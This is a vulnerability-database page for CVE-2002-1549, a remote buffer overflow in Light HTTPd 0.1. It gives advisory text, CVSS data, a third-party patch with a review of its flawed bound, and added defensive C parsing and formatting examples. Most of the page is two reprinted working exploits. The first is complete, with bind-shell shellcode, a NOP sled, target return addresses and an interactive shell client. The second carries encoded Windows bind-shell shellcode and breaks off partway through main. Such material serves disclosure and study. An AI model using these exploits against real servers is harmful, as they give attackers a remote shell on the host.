CVE-2002-1549
CVSS 7.5
Published: 2003-03-31 00:00:00
Revised: 2008-09-05 16:30:53
NMCOES

[Original] Buffer overflow in Light HTTPd (lhttpd) 0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD] Light HTTPD Over-long GET Request Remote Buffer Overflow Vulnerability (CNNVD-200303-118)

Lhttpd is an enhanced version of ghttpd.
Lhttpd mishandles over-long GET requests. A remote attacker can exploit this to trigger a buffer overflow and execute arbitrary instructions on the system with the privileges of the web server process.
An attacker submits an over-long GET request to the Lhttpd service; this triggers a buffer overflow, and carefully constructed request data may execute arbitrary instructions with the privileges of the web server process.
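The overflow described above comes from copying a request-target of unbounded length into a fixed-size buffer. As an added example (not lhttpd code), the following C parser shows the defensive pattern: measure each request-line field against its destination and reject the request with a status code before anything is copied. The limits MAX_LINE and MAX_TARGET, the function names, and the constructed sample requests are choices made for this demo, not values from lhttpd.

```c
/* Added example (not lhttpd code): parsing the HTTP request line with
 * explicit, caller-known bounds. MAX_LINE and MAX_TARGET are assumed
 * limits chosen for the demo, not values from lhttpd. */
#include <stdio.h>
#include <string.h>

#define MAX_LINE   1024   /* longest request line we are willing to scan */
#define MAX_TARGET  255   /* longest request-target we are willing to store */

enum { REQ_OK = 0, REQ_MALFORMED = 400, REQ_TOO_LONG = 414 };

struct request {
    char method[8];
    char target[MAX_TARGET + 1];
    char version[9];          /* "HTTP/x.y" plus NUL */
};

/* Parse "METHOD SP request-target SP HTTP/x.y [CR]LF" from raw.
 * Each field is measured against its destination before anything is
 * copied, so an over-long request is rejected with a status code instead
 * of being written past a fixed-size buffer. */
int parse_request_line(const char *raw, size_t rawlen, struct request *out)
{
    const char *nl = memchr(raw, '\n', rawlen);
    size_t linelen = nl ? (size_t)(nl - raw) : rawlen;
    if (linelen > MAX_LINE)
        return REQ_TOO_LONG;                 /* refuse before scanning */
    if (linelen > 0 && raw[linelen - 1] == '\r')
        linelen--;

    const char *sp1 = memchr(raw, ' ', linelen);
    if (!sp1)
        return REQ_MALFORMED;
    size_t mlen = (size_t)(sp1 - raw);
    if (mlen == 0 || mlen >= sizeof out->method)
        return REQ_MALFORMED;

    const char *tstart = sp1 + 1;
    const char *sp2 = memchr(tstart, ' ', (size_t)(raw + linelen - tstart));
    if (!sp2)
        return REQ_MALFORMED;
    size_t tlen = (size_t)(sp2 - tstart);
    if (tlen == 0)
        return REQ_MALFORMED;
    if (tlen > MAX_TARGET)
        return REQ_TOO_LONG;                 /* the lhttpd case: long target */

    const char *vstart = sp2 + 1;
    size_t vlen = (size_t)(raw + linelen - vstart);
    if (vlen != sizeof out->version - 1 || memcmp(vstart, "HTTP/", 5) != 0)
        return REQ_MALFORMED;

    memcpy(out->method, raw, mlen);      out->method[mlen] = '\0';
    memcpy(out->target, tstart, tlen);   out->target[tlen] = '\0';
    memcpy(out->version, vstart, vlen);  out->version[vlen] = '\0';
    return REQ_OK;
}

/* Convenience wrapper for NUL-terminated sample requests. */
int check_request(const char *raw)
{
    struct request r;
    return parse_request_line(raw, strlen(raw), &r);
}

/* Builds a constructed "GET /AAAA... HTTP/1.0" request whose target is
 * exactly tlen bytes long and returns the parser's verdict on it. */
int check_request_with_target_len(size_t tlen)
{
    static char raw[4096];
    struct request r;
    if (tlen == 0 || tlen > 4000)
        return -1;
    memcpy(raw, "GET /", 5);
    memset(raw + 5, 'A', tlen - 1);               /* target = "/" + A's */
    memcpy(raw + 5 + (tlen - 1), " HTTP/1.0\r\n", 11);
    return parse_request_line(raw, 5 + (tlen - 1) + 11, &r);
}

int main(void)
{
    printf("normal request:   %d\n", check_request("GET /index.html HTTP/1.0\r\n"));
    printf("600-byte target:  %d\n", check_request_with_target_len(600));
    printf("2000-byte target: %d\n", check_request_with_target_len(2000));
    return 0;
}
```

The two rejection paths matter for different reasons: the MAX_LINE check refuses to scan a line that could not be valid anyway, and the MAX_TARGET check is the one that maps directly onto the lhttpd defect, where the target was copied without comparing its length to the destination.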

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1549
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1549
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-118
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/6162
(VENDOR_ADVISORY)  BID  6162
http://www.iss.net/security_center/static/10607.php
(VENDOR_ADVISORY)  XF  light-httpd-bo(10607)
http://archives.neohapsis.com/archives/bugtraq/2002-11/0138.html
(VENDOR_ADVISORY)  BUGTRAQ  20021112 Remote Buffer Overflow vulnerability in Light HTTPd

- Vulnerability Information

Light HTTPD Over-long GET Request Remote Buffer Overflow Vulnerability
High risk    Boundary condition error
2003-03-31 00:00:00 2005-05-13 00:00:00
Remote
Lhttpd is an enhanced version of ghttpd.
Lhttpd mishandles over-long GET requests. A remote attacker can exploit this to trigger a buffer overflow and execute arbitrary instructions on the system with the privileges of the web server process.
An attacker submits an over-long GET request to the Lhttpd service; this triggers a buffer overflow, and carefully constructed request data may execute arbitrary instructions with the privileges of the web server process.

- Advisories and Patches

        Temporary workaround:
        Dong-h0un_u provides the following third-party patch:
        === util.patch ===
        --- util.c Mon Dec 24 09:43:29 2001
        +++ util.c.patch Thu Oct 17 19:02:00 2002
        @@ -220,7 +220,7 @@
         va_list ap;
         va_start(ap, format); // format it all into temp
        - vsprintf(temp, format, ap);
        + vsnprintf(temp, strlen(temp), format, ap);
         va_end(ap);
         time (&t);
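        Review bot: the bound in `+ vsnprintf(temp, strlen(temp), format, ap);` is the length of whatever string is currently in `temp`, not the size of the buffer. If `temp` is empty (a fresh or zeroed buffer) the bound is 0 and nothing is formatted; if it holds stale data the write is limited to that stale length, which has no relation to the real capacity; and if `temp` is not NUL-terminated, `strlen` itself reads past the end. The second argument should be the allocated size of `temp` (`sizeof(temp)` when it is a local array, or the length the caller passes in), and the return value of `vsnprintf` should be checked so a truncated log line is not mistaken for a complete one.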
        === eof ===
        Vendor patch:
        LHTTPd
        ------
        The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        
        http://lhttpd.sourceforge.net/
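The third-party patch above replaces vsprintf with vsnprintf, which is the right function, but it bounds the write with strlen(temp), the length of whatever string is already in the buffer, rather than the buffer's capacity. The following C code is an added example, not lhttpd's util.c: format_bounded shows the bound a caller should pass (the sizeof of the array) and reports truncation, and format_bound_by_strlen reproduces the patch's bound so its effect can be observed on a zeroed buffer. The function names, the 64-byte buffer, and the constructed 299-byte request target are assumptions for the demo.

```c
/* Added example (not lhttpd's util.c): formatting a message into a
 * fixed-size buffer with vsnprintf bounded by the buffer's real capacity.
 * Function names and the 64-byte buffer are choices made for this demo. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

enum { FMT_ERROR = -1, FMT_OK = 0, FMT_TRUNCATED = 1 };

/* Formats into dst, writing at most cap bytes including the terminating
 * NUL. cap is the capacity the caller knows (sizeof the array), never
 * something derived from dst's current contents. The return value tells
 * the caller whether the message was cut short, so a truncated log line
 * cannot silently pass as a complete one. */
int format_bounded(char *dst, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (cap == 0)
        return FMT_ERROR;
    va_start(ap, fmt);
    n = vsnprintf(dst, cap, fmt, ap);
    va_end(ap);
    if (n < 0) {
        dst[0] = '\0';
        return FMT_ERROR;
    }
    return (size_t)n >= cap ? FMT_TRUNCATED : FMT_OK;
}

/* The bound used by the third-party patch, kept here only to show what it
 * does: strlen(dst) measures the string already in the buffer, not the
 * buffer. On an empty buffer the bound is 0 and nothing is written; on
 * stale contents it is an arbitrary number; on a buffer that is not
 * NUL-terminated strlen itself reads out of bounds. Returns the number of
 * bytes that ended up in dst. */
size_t format_bound_by_strlen(char *dst, const char *fmt, ...)
{
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(dst, strlen(dst), fmt, ap);
    va_end(ap);
    return strlen(dst);
}

/* Typical server use: one log line per request into a stack buffer.
 * Returns the format_bounded status so the caller can see truncation. */
int log_request_line(char *out, size_t outcap, const char *client,
                     const char *target)
{
    return format_bounded(out, outcap, "%s GET %s", client, target);
}

int main(void)
{
    char line[64];
    char over[300];
    int rc;

    memset(over, 'A', sizeof over - 1);
    over[sizeof over - 1] = '\0';             /* constructed 299-byte target */

    rc = log_request_line(line, sizeof line, "10.0.0.1", "/index.html");
    printf("%d: %s\n", rc, line);             /* 0: 10.0.0.1 GET /index.html */

    rc = log_request_line(line, sizeof line, "10.0.0.1", over);
    printf("%d: %zu bytes kept\n", rc, strlen(line));   /* 1: 63 bytes kept */

    line[0] = '\0';
    printf("strlen bound wrote %zu bytes\n",
           format_bound_by_strlen(line, "%s", over));   /* 0 */
    return 0;
}
```

When the capacity is passed correctly, an over-long request target still produces a usable, NUL-terminated log line; the only thing the caller has to decide is what to do with the FMT_TRUNCATED status, for example recording that the line was cut rather than dropping it.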

- Vulnerability Information (22012)

Light HTTPD 0.1 GET Request Buffer Overflow Vulnerability (1) (EDBID:22012)
linux remote
2002-11-12 Verified
0 Xpl017Elz
N/A
source: http://www.securityfocus.com/bid/6162/info

Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. 

/*
**
** Proof of Concept LIGHT HTTPd Remote exploit
**                                by Xpl017Elz
** __
** Testing exploit:
**
** bash$ ./0x82-Remote.lhttpdxpl -h 61.37.xx.xx -t 3
**
**  Proof of Concept LIGHT HTTPd Remote exploit
**                                 by Xpl017Elz
**
**  Try `./0x82-Remote.lhttpdxpl -?' for more information.
**
**  [1] Make shellcode.
**  [2] Send exploit (bindshell) code.
**  [3] Waiting, executes the shell !
**  [4] Trying 61.37.xx.xx:36864 ...
**  [5] Connected to 61.37.xx.xx:36864 !
**
**  [*] It's shell ! :-)
**
** Linux testsub 2.4.2-3 #1 Sun Jun 24 01:31:37 KST 2001 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net
**
** Special Greets: INetCop team.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/select.h>

#define HOST "localhost"
#define PORT 3000

struct os
{
    int num;
    char *os;
    int offset;
    unsigned long shaddr;
    int atlen;
};

struct os plat[] =
{
    /* only test */
    {0,"RedHat Linux 6.x localhost lhttpd",1,0xbfffb744,160},
    {1,"RedHat Linux 6.x remote lhttpd",0,0xbfffb608,150},
    {2,"RedHat Linux 7.x localhost lhttpd",3,0xbfffb650,150},
    {3,"RedHat Linux 7.x remote lhttpd",2,0xbfffb650,160},
    {4,NULL,0,0}
};

int setsock(char *hostname,int port);
void getshell(int sock);
void usage(char *args);
void banrl(char *args);
int main(int argc,char *argv[])
{
    int sockfd1;
    int sockfd2;
    int ax82,bx82,cx82,dx82;
    int type=0;
    int port=PORT;
    int atlen=plat[type].atlen;
    int off=plat[type].offset;
    char offbuf[10];
    char hostname[0x82]=HOST;

    char ptbind[] = /* BIND SHELL ON PORT TCP/36864 */
        //------------------- main: -------------------//
        "\xeb\x72"                        /* jmp callz */
        //------------------- start: ------------------//
        "\x5e"                            /* popl %esi */
        //------------------ socket() -----------------//
        "\x29\xc0"                  /* subl %eax, %eax */
        "\x89\x46\x10"        /* movl %eax, 0x10(%esi) */
        "\x40"                            /* incl %eax */
        "\x89\xc3"                  /* movl %eax, %ebx */
        "\x89\x46\x0c"        /* movl %eax, 0x0c(%esi) */
        "\x40"                            /* incl %eax */
        "\x89\x46\x08"        /* movl %eax, 0x08(%esi) */
        "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------- bind() ------------------//
        "\x43"                            /* incl %ebx */
        "\xc6\x46\x10\x10"   /* movb $0x10, 0x10(%esi) */
        "\x66\x89\x5e\x14"     /* movw %bx, 0x14(%esi) */
        "\x88\x46\x08"         /* movb %al, 0x08(%esi) */
        "\x29\xc0"                  /* subl %eax, %eax */
        "\x89\xc2"                  /* movl %eax, %edx */
        "\x89\x46\x18"        /* movl %eax, 0x18(%esi) */
        "\xb0\x90"                  /* movb $0x90, %al */
        "\x66\x89\x46\x16"     /* movw %ax, 0x16(%esi) */
        "\x8d\x4e\x14"        /* leal 0x14(%esi), %ecx */
        "\x89\x4e\x0c"        /* movl %ecx, 0x0c(%esi) */
        "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ listen() -----------------//
        "\x89\x5e\x0c"        /* movl %ebx, 0x0c(%esi) */
        "\x43"                            /* incl %ebx */
        "\x43"                            /* incl %ebx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ accept() -----------------//
        "\x89\x56\x0c"        /* movl %edx, 0x0c(%esi) */
        "\x89\x56\x10"        /* movl %edx, 0x10(%esi) */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\x43"                            /* incl %ebx */
        "\xcd\x80"                        /* int $0x80 */
        //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
        "\x86\xc3"                   /* xchgb %al, %bl */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x29\xc9"                  /* subl %ecx, %ecx */
        "\xcd\x80"                        /* int $0x80 */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x41"                            /* incl %ecx */
        "\xcd\x80"                        /* int $0x80 */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x41"                            /* incl %ecx */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ execve() -----------------//
        "\x88\x56\x07"         /* movb %dl, 0x07(%esi) */
        "\x89\x76\x0c"        /* movl %esi, 0x0c(%esi) */
        "\x87\xf3"                 /* xchgl %esi, %ebx */
        "\x8d\x4b\x0c"        /* leal 0x0c(%ebx), %ecx */
        "\xb0\x0b"                  /* movb $0x0b, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------- callz: ------------------//
        "\xe8\x89\xff\xff\xff"           /* call start */
        "/bin/sh"; /* 128byte */

    char atbuf[512];
    char sendnrecv[1024];
    unsigned long shcode=plat[type].shaddr;
    ax82=bx82=cx82=dx82=0;

    memset(offbuf,0x00,10);
    memset(atbuf,0x00,512);
    memset(sendnrecv,0x00,1024);

    (void)banrl(argv[0]);

    while((dx82=getopt(argc,argv,"S:s:O:o:H:h:P:p:T:t:"))!=EOF)
    {
        switch(dx82)
        {
            case 'S':
            case 's':
                shcode=strtoul(optarg,NULL,0);
                break;

            case 'O':
            case 'o':
                off=atoi(optarg);
                break;

            case 'H':
            case 'h':
                strncpy(hostname,optarg,0x82);
                break;

            case 'P':
            case 'p':
                port=atoi(optarg);
                break;

            case 'T':
            case 't':
                type=atoi(optarg);

                if(type<0 || type>3)
                    usage(argv[0]);

                off=plat[type].offset;
                shcode=plat[type].shaddr;
                atlen=plat[type].atlen;
                break;

            case '?':
                usage(argv[0]);
                break;
        }
    }

    while(off)
    {
        off--;
        offbuf[off]='^';
    }

    fprintf(stdout," [1] Make shellcode.\n");
    for(ax82=0;ax82<atlen-strlen(ptbind);ax82++)
        atbuf[ax82] = 0x90;

    for(bx82=0;bx82<strlen(ptbind);bx82++)
        atbuf[ax82++]=ptbind[bx82];

    for(cx82=ax82;cx82<ax82+0x32;cx82+=4)
        *(long *)&atbuf[cx82]=shcode;

    snprintf(sendnrecv,1024,"GET /%s%s HTTP/1.0\r\n\n",offbuf,atbuf);

    fprintf(stdout," [2] Send exploit (bindshell) code.\n");
    sockfd1=setsock(hostname,port);
    send(sockfd1,sendnrecv,strlen(sendnrecv),0);

    fprintf(stdout," [3] Waiting, executes the shell !\n");
    sleep(3);

    fprintf(stdout," [4] Trying %s:36864 ...\n",hostname);
    sockfd2=setsock(hostname,36864);
    fprintf(stdout," [5] Connected to %s:36864 !\n\n",hostname);
    getshell(sockfd2);
}

int setsock(char *hostname,int port)
{
    int sock;
    struct hostent *sxp;
    struct sockaddr_in sxp_addr;

    if((sxp=gethostbyname(hostname))==NULL)
    {
        herror("gethostbyname() error");
        exit(-1);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
        perror("socket() error");
        exit(-1);
    }

    sxp_addr.sin_family=AF_INET;
    sxp_addr.sin_port=htons(port);
    sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
    bzero(&(sxp_addr.sin_zero),8);

    if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
    {
        perror("connect() error");
        exit(-1);
    }

    return(sock);
}

void getshell(int sock)
{
    int died;
    char *command="uname -a;id\n";
    char readbuf[1024];
    fd_set rset;

    memset(readbuf,0x00,1024);

    fprintf(stdout," [*] It's shell ! :-)\n\n");
    send(sock,command,strlen(command),0);

    for(;;)
    {
        FD_ZERO(&rset);
        FD_SET(sock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(sock+1,&rset,NULL,NULL,NULL);

        if(FD_ISSET(sock,&rset))
        {
            died=read(sock,readbuf,1024);
            if(died<=0)
            {
                exit(0);
            }
            readbuf[died]=0;
            printf("%s",readbuf);
        }
        if(FD_ISSET(STDIN_FILENO,&rset))
        {
            died=read(STDIN_FILENO,readbuf,1024);
            if(died>0)
            {
                readbuf[died]=0;
                write(sock,readbuf,died);
            }
        }
    }
    return;
}

void usage(char *args)
{
    int x82;
    fprintf(stderr,"\n Default Usage: %s -[option] [arguments]\n\n",args);
    fprintf(stderr,"\t -h [hostname] - target host\n");
    fprintf(stderr,"\t -p [port]     - port number\n");
    fprintf(stderr,"\t -s [addr]     - &shellcode addr\n");
    fprintf(stderr,"\t -o [offset]   - offset\n");
    fprintf(stderr,"\t -t [type]     - type number\n\n");
    fprintf(stderr," Example: %s -h localhost -p 3000 -t 1\n\n",args);
    fprintf(stdout,"\t * Select target type: \n\n");
    for(x82=0;plat[x82].num<4;x82++)
        fprintf(stdout,"\t %d. %s\n",plat[x82].num,plat[x82].os);
    fprintf(stdout,"\n Happy Exploit !\n\n");
    exit(0);
}

void banrl(char *args)
{
    fprintf(stdout,"\n Proof of Concept LIGHT HTTPd Remote exploit");
    fprintf(stdout,"\n                                by Xpl017Elz\n\n");
    fprintf(stdout," Try `%s -?' for more information.\n\n",args);
}

- Vulnerability Information (22013)

Light HTTPD 0.1 GET Request Buffer Overflow Vulnerability (2) (EDBID:22013)
linux remote
2002-11-12 Verified
0 uid0x00
N/A
source: http://www.securityfocus.com/bid/6162/info
 
Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. 

/*
 * lhttpd00r.c by uid0x00(uid0x00@hush.com)
 *LHTTPd 0.1 remote buffer overflow exploit
 *
 *should work on any win32. just change ret[] to point at a valid "JMP ESP" address.
 *
 *compile with gcc lhttpd00r.c -o lhttpd00r
 *(tested on cygwin (win2k sp3), compiled with gcc 2.95.3-4 and on redhat 7.2 with gcc 2.96)
 *
 *binds a shell to a desired port.
 *usage: ./lhttpd00r <victimip> <shellport>
 *connect with netcat: nc -v <victimip> <port>
 *
 *Disclaimer:
 *Use of this information constitutes acceptance for use in an AS IS condition. There are
 *NO warranties with regard to this information. In no event shall the author
 *be liable for any damages whatsoever arising out of or in connection with
 *the use or spread of this information. Any use of this information is at the
 *user's own risk.
 *
 */
#ifdef _WIN32
#include <windows.h>
#include <winsock2.h>
#else
#include <sys/socket.h>
#include <sys/errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#define PORT 3000
#define SHELLCODE_SIZE 0x00000300 // 768
void usage(char *argv[])
{
    printf("usage:\t%s <ip> <port>\n", argv[0]);
    exit(0);
}
int main(int argc, char *argv[])
{
int port=PORT;
int s;
struct sockaddr_in SockAdr;
char ret[] = "\xA7\x88\xE2\x77"; //JMP ESP in USER32.DLL Vers. 5.0.2195.4314
char sendnrecv[4096];
char buf[2500];
unsigned short aport, key;
unsigned char shellcode[SHELLCODE_SIZE] =
{
0xEB, 0x03, 0x5E, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x56, 0x8D,
0x76, 0x17, 0x8B, 0xFE, 0x8B, 0xD6, 0xB9, 0x20, 0xFD, 0xFF, 0xFF, 0xF7,
0xD1, 0xB4, 0x63, 0xAC, 0x32, 0xC4, 0xAA, 0xE2, 0xFA, 0x07, 0x04, 0xC2,
0x53, 0x63, 0xE6, 0xA3, 0x1B, 0x6F, 0xE8, 0x13, 0x6F, 0xE8, 0x15, 0x7F,
0xCE, 0xE8, 0x3B, 0x6B, 0x88, 0x6A, 0xE8, 0x23, 0x57, 0xE8, 0xFB, 0xDB,
0x63, 0x63, 0x63, 0x3D, 0x35, 0xEE, 0xDD, 0x95, 0x61, 0x63, 0x63, 0x35,
0xEE, 0x14, 0xDB, 0xEE, 0x35, 0xDE, 0x09, 0x64, 0x3A, 0xCE, 0x9C, 0xB1,
0xC8, 0x81, 0x99, 0xDB, 0x01, 0x04, 0xEE, 0xC7, 0x9C, 0xB1, 0x31, 0x8B,
0x64, 0x63, 0x63, 0x63, 0x14, 0x10, 0x51, 0x3C, 0x50, 0x51, 0x63, 0x9C,
0xB3, 0x39, 0xF0, 0x09, 0x68, 0x3A, 0xCE, 0x9C, 0xB1, 0xC8, 0x81, 0x99,
0x3D, 0xAB, 0x53, 0x61, 0x63, 0x8B, 0x65, 0x63, 0x63, 0x63, 0xE8, 0x07,
0x47, 0x6B, 0x88, 0x15, 0x50, 0xB1, 0x07, 0x9C, 0x51, 0x07, 0xEA, 0x41,
0x35, 0xEE, 0xDE, 0xB3, 0x9E, 0x9C, 0x9C, 0xEE, 0x2C, 0x4F, 0x48, 0xAC,
0xF1, 0x9F, 0x90, 0xC9, 0xF0, 0xEE, 0x24, 0x93, 0xEE, 0x2B, 0x67, 0xEE,
0x1B, 0x77, 0x8B, 0xD3, 0x62, 0x63, 0x63, 0xEE, 0x24, 0x87, 0xEE, 0x2C,
0x8B, 0x8B, 0xC6, 0x62, 0x63, 0x63, 0x80, 0x22, 0xEE, 0xD5, 0x71, 0x60,
0x63, 0x63, 0xEA, 0x14, 0x9F, 0x09, 0x65, 0x09, 0x62, 0x09, 0x61, 0xCE,
0x9C, 0xB3, 0xEA, 0x24, 0x97, 0x23, 0x17, 0x4A, 0x2B, 0x09, 0x62, 0xE8,
0xAF, 0x09, 0x67, 0x32, 0x09, 0x67, 0x0B, 0x9C, 0x9C, 0x63, 0x63, 0x33,
0xCE, 0x9C, 0xB3, 0x3A, 0xE6, 0xA3, 0x16, 0x72, 0x0B, 0x63, 0x61, 0x63,
0x63, 0x34, 0xCE, 0x9C, 0xB3, 0x34, 0xCE, 0x9C, 0xB3, 0xE6, 0xA3, 0x16,
0x65, 0x3D, 0x8A, 0xD1, 0x63, 0x63, 0x63, 0xE8, 0x23, 0x6F, 0xE8, 0x63,
0x34, 0xE8, 0x1C, 0x97, 0x30, 0x30, 0x9C, 0x53, 0x0B, 0x61, 0x63, 0x6E,
0x66, 0xE8, 0xAF, 0x09, 0x73, 0x32, 0x34, 0xCE, 0x9C, 0xB3, 0xE0, 0xA7,
0x73, 0x09, 0x62, 0x34, 0xCE, 0x9C, 0xB3, 0x30, 0x30, 0x34, 0xCE, 0x9C,
0xB3, 0x3C, 0xEA, 0x24, 0x9B, 0x23, 0x17, 0xAA, 0x3D, 0x9C, 0x14, 0x87,
0x9C, 0x57, 0x47, 0x9C, 0x14, 0x93, 0x30, 0x30, 0x0B, 0x62, 0x62, 0x63,
0x63, 0x09, 0x69, 0x3A, 0x30, 0x81, 0x9E, 0x09, 0x27, 0xE8, 0xB7, 0xEF,
0xAA, 0x51, 0xAA, 0x80, 0x72, 0x0B, 0x20, 0x2C, 0x2E, 0x63, 0x0B, 0x22,
0x2D, 0x27, 0x4D, 0x0B, 0x20, 0x2C, 0x2E, 0x2E, 0x88, 0x66, 0x0B, 0x20,
0x2E, 0x27, 0x63, 0xE8, 0xAF, 0xEE, 0x24, 0xB7, 0x33, 0x31, 0x30, 0x30,
0x09, 0x73, 0x09, 0x62, 0x30, 0x30, 0x32, 0x30, 0x9C, 0xF5, 0x95, 0x61,
0x63, 0x63, 0xE0, 0xA7, 0x2B, 0xF2, 0x80, 0x4E, 0x35, 0x30, 0x37, 0x9C,
0x14, 0xB7, 0xEE, 0xD5, 0x99, 0x61, 0x63, 0x63, 0xCE, 0x9C, 0xB3, 0xF2,
0x80, 0x79, 0x3B, 0x05, 0x5E, 0x60, 0x62, 0x16, 0x70, 0x30, 0xE8, 0xAF,
0x30, 0x32, 0x30, 0x30, 0x30, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0x3A,
0xE6, 0xA3, 0x16, 0x60, 0x3D, 0x88, 0x11, 0x80, 0x4E, 0xDB, 0x63, 0x61,
0x63, 0x63, 0x58, 0xAB, 0x15, 0x62, 0xF2, 0x30, 0xE8, 0xB7, 0x30, 0x31,
0x32, 0x34, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0xF2, 0x3B, 0x80, 0x83,
0x3D, 0x30, 0x33, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5, 0x4D, 0x60, 0x63,
0x63, 0x23, 0x17, 0xB2, 0x88, 0xC1, 0x3D, 0x9C, 0x14, 0x9B, 0x09, 0x62,
0xE8, 0xA7, 0x30, 0x09, 0x51, 0xE8, 0xAF, 0x32, 0x30, 0x30, 0x33, 0x30,
0x9C, 0xF5, 0x51, 0x60, 0x63, 0x63, 0x23, 0x17, 0x4B, 0x2B, 0x17, 0x83,
0x30, 0x0B, 0x63, 0x61, 0x63, 0x63, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5,
0x55, 0x60, 0x63, 0x63, 0x23, 0x17, 0x71, 0x2B, 0x30, 0x37, 0x33, 0x34,
0x9C, 0x14, 0x8F, 0x9C, 0xF5, 0x65, 0x60, 0x63, 0x63, 0xE6, 0xA3, 0x16,
0xD8, 0x50, 0xB1, 0x07, 0xEC, 0x61, 0x39, 0xEE, 0xD5, 0x69, 0x60, 0x63,
0x63, 0xE8, 0x7D, 0xE8, 0x1D, 0x53, 0xEE, 0xD6, 0xB7, 0x9E, 0x9C, 0x9C,
0xCE, 0x33, 0xCE, 0x33, 0xCE, 0xCE, 0x09, 0x65, 0x3A, 0xCE, 0x33, 0x81,
0x9F, 0x9C, 0xB4, 0x9C, 0xB4, 0x09, 0x65, 0x3D, 0x9C, 0xB0, 0x2D, 0x16,
0x98, 0xAA, 0x8A, 0xA1, 0x9E, 0x9C, 0x9C, 0x09, 0x62, 0x30, 0x09, 0x6F,
0xE8, 0xB7, 0x30, 0x31, 0x33, 0x32, 0x9C, 0xF5, 0x6D, 0x60, 0x63, 0x63,
0xE0, 0xA7, 0x6F, 0xF2, 0xA0, 0x03, 0xF4, 0xE8, 0x28, 0x5F, 0xE8, 0x2F,
0x7A, 0x1B, 0x60, 0xA8, 0x50, 0x95, 0xEE, 0x77, 0xD0, 0x60, 0x32, 0x43,
0xE8, 0x71, 0x60, 0xB0, 0x50, 0xA3, 0xA2, 0xA3, 0x64, 0x51, 0x61, 0x21,
0xE3, 0x59, 0x63, 0x16, 0x96, 0x25, 0x58, 0xA4, 0x16, 0x87, 0x2D, 0xE8,
0x32, 0x47, 0x60, 0xB0, 0x6C, 0xD4, 0x77, 0x11, 0xE8, 0x22, 0x7F, 0x60,
0xA0, 0xE8, 0x67, 0xF3, 0x60, 0xA0, 0xEA, 0x27, 0x47, 0x7F, 0x02, 0xA0,
0xA4, 0xE9, 0x52, 0x25, 0xE6, 0x20, 0xAA, 0x9E, 0x5D, 0x15, 0xB6, 0xE2,
0x08, 0x82, 0x1C, 0x2B, 0xA0, 0xB2, 0x5C, 0x6C, 0xB6, 0xD3, 0x5D, 0x11,
0x81, 0x9C, 0xB2, 0xCB, 0x09, 0x92, 0x19, 0x9F, 0x50, 0x54, 0xF1, 0xBB,
0xEB, 0xB3, 0x6A, 0xDA, 0xA5, 0x7B, 0x20, 0x97, 0x07, 0x14, 0x39, 0x6F,
0xEB, 0x52, 0x1E, 0xFD, 0x19, 0x18, 0x1A, 0x5F, 0x07, 0x14, 0x1A, 0x6D,
0x09, 0x11, 0xFA, 0x3E, 0x95, 0x12, 0x3A, 0x6D, 0xFF, 0x1E, 0xFE, 0xF0
};
printf("\nLHTTPd 0.1 remote exploit by uid0x00 (uid0x00@hush.com)\n\n");
//check arguments
if(argc != 3)
{
usage(argv);
}
if ( (atoi(argv[2]) > 65535) || (atoi(argv[2]) <= 0) ) usage(argv);
//set port
aport = (short)atoi(argv[2]);
